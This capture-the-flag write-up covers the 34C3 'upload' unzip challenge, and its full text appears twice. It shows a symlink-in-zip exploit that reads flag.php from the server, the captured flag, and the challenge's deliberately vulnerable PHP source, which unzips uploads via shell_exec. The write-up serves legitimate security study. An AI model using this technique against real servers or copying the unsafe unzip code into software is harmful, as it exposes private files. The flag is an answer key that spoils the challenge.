pich4ya/upload - easy 63.txt

## upload - easy 63.txt
chall:
This is an useful service to unzip some files.
http://35.197.205.153/
We added a flag for your convenience.
http://35.197.205.153/flag.php

1.)

$ sudo mkdir -p /var/www/
$ sudo touch /var/www/flag.php
$ ln -s /var/www/flag.php linkz
$ zip --symlinks test.zip linkz
  adding: linkz (stored 0%)

2.) upload test.zip
3.) visit the linkz
http://35.197.205.153/uploads/upl5a4534c29f637/
http://35.197.205.153/uploads/upl5a4534c29f637/linkz

<?php
$flag = "34C3_unpack_th3_M1ss1ng_l!nk"
?>

source given by the chall:
<?php
$UPLOADS = '/var/www/uploads/';
if(!empty($_FILES['uploaded_file'])) {
    $paths = scandir($UPLOADS);
    $now = time();
    foreach($paths as $path) {
        if ($path == '.') {
            continue;
        }
        $mtime = filemtime($UPLOADS . $path);
        if ($now - $mtime > 120) {
            shell_exec('rm -rf ' . $UPLOADS . $path);
        }
    }
    $path = $UPLOADS . uniqid('upl') . '/';
    if(!mkdir($path, 0777, true)) {
        die('mkdir failed');
    }
    $zip = $path . uniqid('zip');
    if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $zip)) {
        shell_exec('unzip -j -n ' . $zip . ' -d ' . $path);
        unlink($zip);
        header('Location: uploads/'. basename($path) . '/');
    } else {
        echo 'There was an error uploading the file, please try again!';
    }
} else {
?>
<!DOCTYPE html>
<html>
<head>
    <title>Upload your files</title>
</head>
<body>
<?php
    if (@$_GET['source']) {
        highlight_file(__FILE__);
    } else {
?>
    <form enctype="multipart/form-data" method="POST">
        <p>Upload your file</p>
        <input type="file" name="uploaded_file"></input><br />
        <input type="submit"></input>
    </form>
    <a href="?source=1">Show source</a>
</body>
</html>
<?php
    }
}
?>
	chall:
	This is an useful service to unzip some files.
	http://35.197.205.153/
	We added a flag for your convenience.
	http://35.197.205.153/flag.php

	1.)

	$ sudo mkdir -p /var/www/
	$ sudo touch /var/www/flag.php
	$ ln -s /var/www/flag.php linkz
	$ zip --symlinks test.zip linkz
	adding: linkz (stored 0%)

	2.) upload test.zip
	3.) visit the linkz
	http://35.197.205.153/uploads/upl5a4534c29f637/
	http://35.197.205.153/uploads/upl5a4534c29f637/linkz

	<?php
	$flag = "34C3_unpack_th3_M1ss1ng_l!nk"
	?>

	source given by the chall:
	<?php
	$UPLOADS = '/var/www/uploads/';
	if(!empty($_FILES['uploaded_file'])) {
	$paths = scandir($UPLOADS);
	$now = time();
	foreach($paths as $path) {
	if ($path == '.') {
	continue;
	}
	$mtime = filemtime($UPLOADS . $path);
	if ($now - $mtime > 120) {
	shell_exec('rm -rf ' . $UPLOADS . $path);
	}
	}
	$path = $UPLOADS . uniqid('upl') . '/';
	if(!mkdir($path, 0777, true)) {
	die('mkdir failed');
	}
	$zip = $path . uniqid('zip');
	if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $zip)) {
	shell_exec('unzip -j -n ' . $zip . ' -d ' . $path);
	unlink($zip);
	header('Location: uploads/'. basename($path) . '/');
	} else {
	echo 'There was an error uploading the file, please try again!';
	}
	} else {
	?>
	<!DOCTYPE html>
	<html>
	<head>
	<title>Upload your files</title>
	</head>
	<body>
	<?php
	if (@$_GET['source']) {
	highlight_file(__FILE__);
	} else {
	?>
	<form enctype="multipart/form-data" method="POST">
	<p>Upload your file</p>
	<input type="file" name="uploaded_file"></input><br />
	<input type="submit"></input>
	</form>
	<a href="?source=1">Show source</a>
	</body>
	</html>
	<?php
	}
	}
	?>